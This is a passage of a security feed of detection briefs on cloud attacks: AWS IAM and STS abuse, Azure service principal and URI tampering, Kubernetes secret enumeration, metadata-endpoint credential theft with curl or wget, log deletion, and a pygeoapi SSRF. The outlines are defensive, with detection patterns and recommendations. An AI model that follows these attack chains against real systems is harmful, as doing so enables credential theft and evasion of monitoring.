<li>Investigate any instances of <code>CreateUser</code> or <code>CreateAccessKey</code> events in AWS CloudTrail logs where the <code>userAgent</code> contains &ldquo;S3 Browser&rdquo;.</li>
<li>Implement multi-factor authentication (MFA) for all IAM users to mitigate the risk of credential compromise.</li>
<li>Review and enforce the principle of least privilege for all IAM users and roles to limit the impact of compromised credentials.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>iam</category><category>privilege-escalation</category><category>persistence</category></item><item><title>Azure Service Principal Removal Detection</title><link>https://feed.craftedsignal.io/briefs/2024-01-azure-service-principal-removed/</link><pubDate>Wed, 03 Jan 2024 14:27:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-azure-service-principal-removed/</guid><description>Detection of a service principal removal in Azure, potentially indicating malicious activity or an attempt to remove evidence of a compromise.</description><content:encoded><![CDATA[<p>The removal of a service principal within an Azure environment can be indicative of various activities, ranging from legitimate administrative tasks to malicious actions undertaken by threat actors attempting to cover their tracks. While service principals are routinely removed as part of lifecycle management, unauthorized or unexpected removals should be investigated promptly. This detection focuses on identifying such removals through Azure Activity Logs, allowing security teams to quickly respond to potentially suspicious events.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized access to an Azure account through compromised credentials or other means.</li>
<li>The attacker identifies a service principal used for malicious purposes or to maintain persistence.</li>
<li>The attacker attempts to remove the service principal to evade detection or disrupt incident response efforts.</li>
<li>The attacker executes the necessary commands or uses the Azure portal to initiate the service principal removal. This action is logged in the Azure Activity Logs.</li>
<li>The Azure Activity Logs record an event with the message &ldquo;Remove service principal&rdquo;.</li>
<li>The detection rule triggers based on the &ldquo;Remove service principal&rdquo; message in the Azure Activity Logs.</li>
<li>Security analysts investigate the event, examining the user identity, user agent, and hostname associated with the removal.</li>
<li>If the removal is deemed unauthorized or suspicious, further incident response procedures are initiated.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful removal of a service principal by a malicious actor can disrupt legitimate applications relying on that principal for authentication and authorization. It can also hinder incident response efforts by eliminating a potential avenue for investigation or remediation. The impact can range from service disruptions to prolonged breaches if the attacker successfully covers their tracks. The number of affected applications and the severity of the disruption depend on the role and permissions associated with the removed service principal.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Azure Service Principal Removed&rdquo; to your SIEM and tune for your environment, focusing on identifying legitimate administrator activity to reduce false positives.</li>
<li>Investigate any detected instance of service principal removal, focusing on the user identity, user agent, and hostname from the Azure Activity Logs to determine legitimacy.</li>
<li>Review Azure AD audit logs for related activities occurring before and after the service principal removal.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>azure</category><category>service principal</category><category>stealth</category><category>cloud</category></item><item><title>Azure Application URI Configuration Modification</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-azure-app-uri-modification/</link><pubDate>Wed, 03 Jan 2024 14:21:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-azure-app-uri-modification/</guid><description>Detection of Azure application URI modifications that can be indicative of malicious activity, such as using dangling URIs, non-HTTPS URIs, wildcard domains, or URIs pointing to uncontrolled domains, potentially leading to initial access, stealth, persistence, credential access, and privilege escalation.</description><content:encoded><![CDATA[<p>Attackers may modify application URIs within Azure Active Directory to redirect users or applications to malicious resources, obtain unauthorized access, or establish persistence. The modification of an application&rsquo;s URI can be a subtle but effective technique for gaining a foothold in an environment. By manipulating the URI settings, attackers can redirect traffic to attacker-controlled servers, intercept credentials, or perform other malicious actions. This activity is often difficult to detect because it can blend in with legitimate administrative tasks. Investigation is merited if URIs for domain names no longer exist, are not using HTTPS, have wildcards at the end of the domain, are not unique to that app, or point to domains that the organization does not control.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to an Azure account with sufficient privileges to modify application registrations.</li>
<li>The attacker navigates to the Azure Active Directory portal.</li>
<li>The attacker locates a target application registration.</li>
<li>The attacker modifies the application&rsquo;s URI settings, such as the reply URLs or identifier URIs.</li>
<li>The attacker configures the URI to point to a malicious server or a phishing page.</li>
<li>Users or applications are redirected to the malicious URI when attempting to authenticate or access the application.</li>
<li>The attacker intercepts credentials or performs other malicious actions.</li>
<li>The attacker establishes persistence by maintaining control over the application&rsquo;s URI settings.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack could lead to credential theft, data breaches, or unauthorized access to sensitive resources. By compromising application URIs, attackers can redirect users to phishing pages, intercept credentials, or gain a foothold in the environment for further exploitation. This activity can be difficult to detect and can have a significant impact on the organization&rsquo;s security posture.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Application URI Configuration Changes</code> to your SIEM to detect suspicious modifications to application URIs in Azure Audit Logs.</li>
<li>Investigate any alerts generated by the Sigma rule <code>Application URI Configuration Changes</code> to determine if the URI modification is legitimate or malicious.</li>
<li>Monitor Azure Audit Logs for any changes to application URI settings (as indicated by <code>properties.message: Update Application Sucess- Property Name AppAddress</code>) and validate the legitimacy of the changes.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>azure</category><category>application</category><category>uri</category><category>modification</category><category>persistence</category><category>credential-access</category><category>privilege-escalation</category></item><item><title>Suspicious AWS STS GetSessionToken Usage</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-aws-sts-getsessiontoken-misuse/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-aws-sts-getsessiontoken-misuse/</guid><description>The AWS STS GetSessionToken API is being misused to create temporary tokens for lateral movement and privilege escalation within AWS environments by potentially compromised IAM users.</description><content:encoded><![CDATA[<p>The AWS Security Token Service (STS) GetSessionToken API allows IAM users to create temporary security credentials. Attackers can abuse this functionality by generating tokens with elevated privileges or for lateral movement within an AWS environment if an IAM user&rsquo;s credentials have been compromised. This activity can be difficult to detect as GetSessionToken is a legitimate function, but unusual patterns or IAM users generating tokens where it is not expected should be investigated. This activity is of particular concern because it bypasses normal IAM role assumption logging and creates a separate credential for an attacker to abuse, making access more difficult to track. The impact is significant, allowing attackers to perform actions as the compromised IAM user or escalate privileges.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS environment, potentially through compromised IAM user credentials.</li>
<li>The attacker authenticates to AWS using the compromised IAM user credentials.</li>
<li>The attacker calls the STS GetSessionToken API, specifying desired permissions or roles (if permitted by the IAM user&rsquo;s policies).</li>
<li>AWS STS generates a new set of temporary credentials (access key ID, secret access key, and session token).</li>
<li>The attacker configures their AWS CLI or SDK to use the newly acquired temporary credentials.</li>
<li>The attacker leverages these temporary credentials to perform actions within the AWS environment, potentially escalating privileges or moving laterally.</li>
<li>The attacker covers their tracks by deleting the CloudTrail logs.</li>
<li>The attacker exfiltrates sensitive data, deploys malware, or causes disruption within the AWS environment using the acquired privileges.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised AWS environments can lead to data breaches, service disruptions, and financial losses. Successful exploitation via GetSessionToken misuse allows attackers to move laterally, escalate privileges, and perform unauthorized actions within the AWS infrastructure. The number of affected organizations is currently unknown, but any organization relying on AWS is potentially at risk. If successful, attackers can steal sensitive data, compromise critical systems, and disrupt business operations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS STS GetSessionToken Misuse&rdquo; to your SIEM to detect suspicious GetSessionToken API calls (see rules section).</li>
<li>Investigate GetSessionToken calls where <code>userIdentity.type</code> is <code>IAMUser</code> to determine if the request is legitimate.</li>
<li>Monitor CloudTrail logs for unusual patterns of GetSessionToken usage, particularly from unfamiliar user agents or hosts.</li>
<li>Implement strong IAM policies and MFA to minimize the risk of compromised IAM user credentials.</li>
<li>Review the false positives section of the Sigma rule to tune the rule for your specific environment.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>aws</category><category>cloud</category><category>lateral-movement</category><category>privilege-escalation</category><category>sts</category><category>GetSessionToken</category></item><item><title>pygeoapi Unauthenticated SSRF Vulnerability in OGC API - Processes Subscriber</title><link>https://feed.craftedsignal.io/briefs/2024-01-pygeoapi-ssrf/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-pygeoapi-ssrf/</guid><description>pygeoapi versions 0.23.0 to 0.23.2 contain an unauthenticated server-side request forgery (SSRF) vulnerability where OGC API process execution requests can use the subscriber object to make requests to internal HTTP services, which is resolved in version 0.23.3 by disabling internal requests by default.</description><content:encoded><![CDATA[<p>pygeoapi versions 0.23.0, 0.23.1, and 0.23.2 are vulnerable to Server-Side Request Forgery (SSRF). The vulnerability stems from the OGC API - Processes functionality, specifically how it handles the <code>subscriber</code> object during process execution. An unauthenticated attacker can exploit this flaw to send requests to internal HTTP services, potentially gaining access to sensitive information or triggering unintended actions within the internal network. This issue was patched in version 0.23.3 by disabling internal HTTP requests by default, unless explicitly allowed in the configuration. The patch includes the introduction of an <code>allow_internal_requests</code> directive for administrators who require this functionality. This vulnerability poses a significant risk to organizations using affected versions of pygeoapi.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a pygeoapi instance running a vulnerable version (0.23.0 - 0.23.2).</li>
<li>The attacker crafts a malicious OGC API process execution request.</li>
<li>Within the request, the attacker manipulates the <code>subscriber</code> object.</li>
<li>The <code>subscriber</code> object is configured to target an internal HTTP service by specifying the internal service&rsquo;s address.</li>
<li>pygeoapi processes the request without proper validation of the <code>subscriber</code> object&rsquo;s target.</li>
<li>pygeoapi initiates an HTTP request to the attacker-specified internal service.</li>
<li>The internal service responds to pygeoapi.</li>
<li>pygeoapi may then relay information received from the internal service back to the attacker, or the attacker might be able to trigger actions based on the SSRF.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an unauthenticated attacker to interact with internal HTTP services that should not be publicly accessible. This can lead to the disclosure of sensitive information, such as internal configurations, API keys, or customer data. The attacker may also be able to trigger actions on the internal services, potentially leading to service disruption or data manipulation. The severity of the impact depends on the nature and security posture of the internal services exposed by this vulnerability.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to pygeoapi version 0.23.3 or later to remediate CVE-2026-42352.</li>
<li>Apply the provided patch <a href="https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef">3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef</a> if upgrading is not immediately feasible.</li>
<li>If upgrading or patching is not immediately feasible, disable process-based resources in the pygeoapi configuration as a workaround.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>pygeoapi</category><category>ssrf</category><category>ogc api</category><category>cve-2026-42352</category><category>vulnerability</category><category>cloud</category></item><item><title>Kubernetes Secret Access with Suspicious User Agent</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-kubernetes-secret-access/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-kubernetes-secret-access/</guid><description>Detects read access to Kubernetes Secrets (`get`/`list`) with a user agent matching a curated set of non-standard or attacker-leaning clients, indicating potential credential access.</description><content:encoded><![CDATA[<p>This rule identifies suspicious access patterns to Kubernetes Secrets. Attackers may attempt to retrieve secrets containing sensitive information such as credentials, API keys, and other confidential data. This detection focuses on identifying access attempts originating from clients with non-standard user agents, such as scripting runtimes (Python, Perl, PHP), basic HTTP tools (curl, wget), or those associated with penetration testing distributions (Kali Linux). Legitimate access typically involves stable, purpose-built user agents. This detection helps uncover potential credential access attempts that bypass standard access controls. The rule specifically triggers on <code>get</code> and <code>list</code> actions against Kubernetes secrets, coupled with a suspicious <code>user_agent.original</code> and a populated <code>source.ip</code>.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a compromised host or pod within the Kubernetes cluster or an external system with network access to the Kubernetes API server.</li>
<li>The attacker crafts HTTP requests to the Kubernetes API server to enumerate available secrets.</li>
<li>The attacker uses tooling such as <code>curl</code>, <code>wget</code>, or custom scripts with user agents like <code>python-requests</code> or <code>Go-http-client</code> to interact with the API.</li>
<li>The attacker sends a <code>GET</code> or <code>LIST</code> request to the <code>/api/v1/namespaces/{namespace}/secrets/{name}</code> endpoint to retrieve specific secrets or list all secrets in a namespace.</li>
<li>The Kubernetes API server authenticates and authorizes the request based on the attacker&rsquo;s assigned RBAC roles, potentially using impersonation.</li>
<li>If authorized, the API server returns the secret data in the response.</li>
<li>The attacker extracts sensitive information like passwords, tokens, or API keys from the retrieved secrets.</li>
<li>The attacker uses the compromised credentials to escalate privileges, move laterally within the cluster, or access external resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to steal sensitive information stored in Kubernetes secrets, leading to privilege escalation, lateral movement, and unauthorized access to critical systems and data. Compromised credentials can be used to access external cloud resources or internal services. The impact depends on the sensitivity of the secrets, but can include data breaches, service disruptions, and significant financial loss.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Kubernetes Secret get or list with Suspicious User Agent</code> to your SIEM to detect suspicious access to Kubernetes secrets.</li>
<li>Investigate any alerts triggered by the Sigma rule, focusing on the user identity (<code>user.name</code>), targeted namespace (<code>kubernetes.audit.objectRef.namespace</code>), and source IP (<code>source.ip</code>).</li>
<li>Baseline expected user agents for legitimate automation and add exceptions to the detection rule for known good traffic.</li>
<li>Rotate affected secrets and credentials, revoke tokens, and tighten RBAC if unauthorized access is detected.</li>
<li>Block or isolate the source host at the network edge to the API server where appropriate, based on <code>source.ip</code>.</li>
<li>Monitor <code>kubernetes.audit.annotations.authorization_k8s_io/decision</code> to identify unauthorized attempts to access secrets.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubernetes</category><category>credential-access</category><category>cloud</category></item><item><title>Kubernetes Pod Exec Cloud Instance Metadata Access</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-metadata-access/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-metadata-access/</guid><description>Detection of Kubernetes pod exec sessions accessing cloud instance metadata endpoints, indicating potential credential theft from AWS, GCP, or Azure.</description><content:encoded><![CDATA[<p>This alert focuses on detecting Kubernetes pod exec sessions that attempt to access cloud instance metadata endpoints. The activity is flagged when the decoded command line of a pod exec session contains references to cloud instance metadata services across AWS, GCP, and Azure. Attackers may exploit this to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor. This is a high-risk behavior because it can expose short-lived cloud credentials to code running inside a container, particularly concerning in multi-tenant and regulated environments. This detection classifies the cloud target and whether the command indicates credential theft or reconnaissance.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a Kubernetes cluster.</li>
<li>Attacker identifies a vulnerable pod within the cluster.</li>
<li>The attacker uses <code>kubectl exec</code> to gain shell access to the pod.</li>
<li>Inside the pod, the attacker crafts a command-line request targeting the cloud instance metadata service (IMDS) endpoint.</li>
<li>The command, often using <code>curl</code> or <code>wget</code>, attempts to retrieve sensitive information such as IAM roles, tokens, or instance attributes.</li>
<li>The IMDS responds with the requested data, which may include credentials or configuration details.</li>
<li>The attacker exfiltrates the stolen credentials or uses them to escalate privileges within the cloud environment.</li>
<li>Attacker uses the harvested credentials to move laterally, compromise other cloud resources, or exfiltrate sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised credentials can lead to unauthorized access to sensitive data, lateral movement within the cloud environment, and potential data exfiltration. A successful attack could impact multiple organizations sharing the same Kubernetes cluster. The impact could include financial losses, reputational damage, and regulatory fines, depending on the type of data compromised and the extent of the breach.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Kubernetes Pod Exec IMDS Access</code> to detect suspicious command-line activity within Kubernetes pods.</li>
<li>Block access to the cloud instance metadata endpoints (169.254.169.254) from within Kubernetes pods using network policies.</li>
<li>Regularly review and tighten RBAC permissions related to <code>pods/exec</code> to limit the ability of attackers to gain shell access.</li>
<li>Monitor cloud audit logs for suspicious STS or token issuance events correlated with Kubernetes pod exec events.</li>
<li>Implement workload identity solutions to avoid the need to expose instance metadata to pods.</li>
<li>Baseline approved images and tune exclusions narrowly to avoid false positives.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubernetes</category><category>cloud</category><category>credential_access</category><category>execution</category></item><item><title>AWS VPC Flow Logs Deletion for Defense Evasion</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-aws-vpc-flow-logs-deleted/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-aws-vpc-flow-logs-deleted/</guid><description>An adversary may delete VPC Flow Logs in AWS EC2 by calling the DeleteFlowLogs API to evade detection and hinder forensic investigations.</description><content:encoded><![CDATA[<p>An adversary with sufficient privileges within an AWS environment may attempt to delete VPC Flow Logs. These logs are crucial for monitoring network traffic within a VPC, and their removal can significantly impede incident response and forensic investigations. The deletion is accomplished by making a <code>DeleteFlowLogs</code> API call. This action is often taken to remove evidence of malicious activity, such as lateral movement, command and control communication, or data exfiltration. The impact of this activity can be severe, potentially allowing attackers to operate undetected for extended periods.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the AWS environment through compromised credentials or an exploited vulnerability (not detailed in source).</li>
<li>The attacker escalates privileges within the AWS environment to gain the necessary permissions to delete VPC Flow Logs (not detailed in source).</li>
<li>The attacker uses the AWS CLI or AWS Management Console to execute the <code>DeleteFlowLogs</code> API call.</li>
<li>The attacker identifies the specific Flow Log IDs that need to be deleted.</li>
<li>The attacker authenticates to the AWS API using stolen or generated credentials.</li>
<li>The <code>DeleteFlowLogs</code> API call is made, specifying the Flow Log IDs to be deleted.</li>
<li>AWS processes the request and deletes the specified VPC Flow Logs.</li>
<li>The attacker verifies the deletion of the Flow Logs to ensure that their actions are no longer being logged.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful deletion of VPC Flow Logs prevents security teams from detecting malicious activity within the AWS environment. Without these logs, it becomes significantly more difficult to investigate security incidents, track attacker movements, and understand the scope of a compromise. This can lead to delayed incident response, increased dwell time for attackers, and greater overall damage. The absence of flow logs severely limits network visibility, hindering any attempt to reconstruct events or identify compromised assets.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement the Sigma rule &ldquo;AWS VPC Flow Logs Deleted&rdquo; to detect instances of <code>DeleteFlowLogs</code> API calls (reference: rules section).</li>
<li>Monitor CloudTrail logs for <code>DeleteFlowLogs</code> events and investigate any unexpected occurrences (reference: logsource).</li>
<li>Enforce the principle of least privilege to restrict IAM users and roles from having the <code>ec2:DeleteFlowLogs</code> permission unless absolutely necessary.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts, especially those with administrative privileges.</li>
<li>Regularly review and audit IAM policies to ensure that permissions are appropriately scoped and not overly permissive.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>defense-evasion</category><category>vpc</category><category>flow-logs</category></item><item><title>AWS Root Account Usage Detected</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-aws-root-usage/</link><pubDate>Tue, 02 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-aws-root-usage/</guid><description>The AWS root account, which grants unrestricted access to all resources within an AWS account, was used, potentially indicating unauthorized activity, privilege escalation, or a breach of security best practices.</description><content:encoded><![CDATA[<p>The use of the AWS root account should be strictly limited to specific tasks that cannot be performed with IAM users or roles. This alert indicates that the root account was used, which could signify various security concerns. An attacker with access to the root account can perform any action within the AWS environment, including creating new users, modifying security policies, accessing sensitive data, and deleting resources. Defenders should investigate each instance of root account usage to determine legitimacy. This activity may also indicate a misconfiguration where IAM roles should be used.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to the AWS root account credentials through credential theft or other means.</li>
<li>The attacker authenticates to the AWS Management Console or uses the AWS CLI with the root account credentials.</li>
<li>The attacker enumerates AWS resources to identify potential targets for privilege escalation.</li>
<li>The attacker creates or modifies IAM policies to grant themselves additional permissions.</li>
<li>The attacker may create new IAM users or roles with elevated privileges.</li>
<li>The attacker uses the elevated privileges to access sensitive data stored in S3 buckets or other AWS services.</li>
<li>The attacker modifies security configurations, such as network access control lists or security groups, to facilitate lateral movement or data exfiltration.</li>
<li>The attacker could disable logging features to cover tracks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromise of the AWS root account can lead to a complete breach of the AWS environment, resulting in unauthorized access to sensitive data, data loss, service disruption, and potential financial losses. Attackers can leverage root privileges to perform nearly any action within the AWS account, affecting all services and resources. The number of affected victims depends on the scope and criticality of the AWS environment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS Root Credentials&rdquo; to your SIEM to detect root account usage based on CloudTrail logs.</li>
<li>Investigate all instances of root account usage identified by the &ldquo;AWS Root Credentials&rdquo; Sigma rule to determine legitimacy.</li>
<li>Enforce multi-factor authentication (MFA) on all AWS accounts, including the root account, as documented in <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html">AWS documentation</a>.</li>
<li>Implement the principle of least privilege by granting IAM users and roles only the permissions they need to perform their tasks.</li>
<li>Regularly audit IAM policies and user permissions to identify and remove unnecessary privileges.</li>
<li>Disable or restrict root account access wherever possible, delegating tasks to IAM users/roles.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>privilege-escalation</category><category>initial-access</category><category>persistence</category><category>stealth</category></item><item><title>AWS S3 Bucket Deletion Detected via CloudTrail</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-bucket-deletion/</link><pubDate>Tue, 02 Jan 2024 14:27:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-bucket-deletion/</guid><description>An AWS S3 bucket deletion event was detected via CloudTrail logs, potentially indicating data loss or unauthorized access attempts.</description><content:encoded><![CDATA[<p>The deletion of S3 buckets is a critical event to monitor in AWS environments. While legitimate administrative actions may involve bucket deletion, unauthorized or accidental removal of buckets can lead to significant data loss and business disruption. This brief focuses on detecting such events through AWS CloudTrail logs, which record API calls made within the AWS infrastructure. Monitoring for <code>DeleteBucket</code> events helps identify potential malicious activity or unintentional misconfigurations that could compromise data availability and integrity. This detection focuses on identifying DeleteBucket API calls, successful or otherwise, within CloudTrail logs to provide early warning of potential data compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to an AWS account through compromised credentials or a privilege escalation exploit.</li>
<li>The attacker lists existing S3 buckets to identify potential targets using the <code>ListBuckets</code> API call.</li>
<li>The attacker identifies a target S3 bucket containing sensitive data.</li>
<li>The attacker attempts to delete the target S3 bucket by issuing a <code>DeleteBucket</code> API call using the AWS CLI or SDK.</li>
<li>CloudTrail logs the <code>DeleteBucket</code> event, including the user identity, timestamp, and bucket name.</li>
<li>If successful, the S3 bucket and its contents are permanently deleted.</li>
<li>The attacker may attempt to remove CloudTrail logs to cover their tracks, using the <code>DeleteTrail</code> API call.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The deletion of an S3 bucket results in the permanent loss of all data stored within that bucket. This can lead to service disruption, data breaches, and financial losses, especially if the bucket contained critical business data or backups. The impact can range from temporary inconvenience to complete business failure depending on the criticality of the data lost and the organization&rsquo;s backup and recovery capabilities. Without proper monitoring and alerting, an S3 bucket deletion can go unnoticed for extended periods, hindering incident response efforts and potentially exacerbating the damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect S3 bucket deletion events in CloudTrail logs.</li>
<li>Investigate any detected <code>DeleteBucket</code> events to verify their legitimacy and ensure they were authorized by appropriate personnel.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts to prevent unauthorized access and reduce the risk of credential compromise.</li>
<li>Enforce strict IAM policies and regularly review user permissions to minimize the blast radius of compromised accounts.</li>
<li>Enable versioning on S3 buckets to allow for the recovery of accidentally deleted objects, mitigating the impact of data loss.</li>
<li>Implement data backup and disaster recovery plans to ensure business continuity in the event of a successful bucket deletion attack.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>s3</category><category>data_loss</category></item><item><title>S3 Browser Used to Create IAM Login Profiles</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-s3browser-iam-loginprofile/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-s3browser-iam-loginprofile/</guid><description>The S3 Browser utility is being used to enumerate IAM users lacking login profiles and subsequently create them, potentially for reconnaissance, persistence, and privilege escalation within AWS environments.</description><content:encoded><![CDATA[<p>The threat involves the use of the S3 Browser utility, a Windows application, to interact with Amazon Web Services (AWS) Identity and Access Management (IAM). Attackers are leveraging S3 Browser to perform reconnaissance, specifically targeting IAM users that do not have a login profile configured. Upon identifying such users, the attacker proceeds to create a login profile for them. This tactic may be indicative of an attempt to gain unauthorized access or maintain persistence within the AWS environment. The activity is detectable via AWS CloudTrail logs and was first publicly reported in May 2023 in connection with the threat actor GUIVIL.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a system with AWS CLI tools installed or uses a compromised IAM user with sufficient permissions.</li>
<li>The attacker configures S3 Browser with valid AWS credentials, enabling interaction with the AWS environment.</li>
<li>S3 Browser initiates a <code>GetLoginProfile</code> API call in AWS CloudTrail, to enumerate IAM users and identify those without existing login profiles.</li>
<li>S3 Browser, upon finding an IAM user without a login profile, initiates a <code>CreateLoginProfile</code> API call.</li>
<li>The attacker sets a password for the newly created login profile, gaining console access to the targeted IAM user account.</li>
<li>The attacker logs into the AWS console using the newly created credentials.</li>
<li>The attacker leverages the IAM user&rsquo;s permissions to perform further reconnaissance, lateral movement, or data exfiltration within the AWS environment.</li>
<li>The attacker establishes persistence by maintaining access through the created login profile, even if other access methods are revoked.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to gain unauthorized console access to previously unprotected IAM user accounts. This can lead to privilege escalation, data breaches, and disruption of cloud services. The lack of multi-factor authentication on newly created login profiles increases the risk of account compromise. The impact can range from reconnaissance to full-scale control of the AWS environment, depending on the permissions associated with the compromised IAM users.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect <code>GetLoginProfile</code> and <code>CreateLoginProfile</code> events originating from the S3 Browser user agent in AWS CloudTrail logs.</li>
<li>Investigate any instances of IAM LoginProfile creation originating from unusual user agents or IP addresses.</li>
<li>Implement multi-factor authentication (MFA) for all IAM users, including those with console access to mitigate the impact of compromised credentials.</li>
<li>Review IAM policies to ensure least privilege and restrict the ability to create or modify LoginProfiles to authorized personnel only.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>aws</category><category>cloud</category><category>iam</category><category>s3browser</category><category>privilege-escalation</category><category>persistence</category></item><item><title>Kubernetes Secrets Enumeration from Non-Loopback Client</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-secrets-enumeration/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-secrets-enumeration/</guid><description>Detection of Kubernetes Secrets listing from non-loopback clients targeting cluster-wide secrets or sensitive namespaces, potentially indicating unauthorized credential access or discovery.</description><content:encoded><![CDATA[<p>This detection identifies Kubernetes Secrets listing events originating from non-loopback clients. Attackers may attempt to enumerate Kubernetes Secrets to gain access to sensitive information such as credentials, API keys, and other confidential data stored within the cluster. The rule specifically focuses on requests targeting cluster-wide secrets or list operations under the <code>kube-system</code> or <code>default</code> namespaces, which are often targeted due to their high concentration of sensitive information. This activity is indicative of potential credential access or discovery attempts within the Kubernetes environment. This rule helps defenders identify and respond to potential reconnaissance or lateral movement activities within their Kubernetes clusters.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a node within the Kubernetes cluster or a system with access to the Kubernetes API.</li>
<li>The attacker authenticates to the Kubernetes API server using compromised credentials or by exploiting a vulnerability.</li>
<li>The attacker crafts a <code>list</code> request targeting the <code>/api/v1/secrets</code> endpoint to enumerate all secrets in the cluster.</li>
<li>Alternatively, the attacker targets secrets within the <code>kube-system</code> namespace using <code>/api/v1/namespaces/kube-system/secrets</code> or <code>default</code> namespace using <code>/api/v1/namespaces/default/secrets</code>.</li>
<li>The API server responds with a list of secrets, potentially including sensitive information.</li>
<li>The attacker analyzes the retrieved secrets to identify valuable credentials or configuration data.</li>
<li>The attacker uses the acquired credentials to escalate privileges, move laterally within the cluster, or access external resources.</li>
</ol>
<h2 id="impact">Impact</h2>
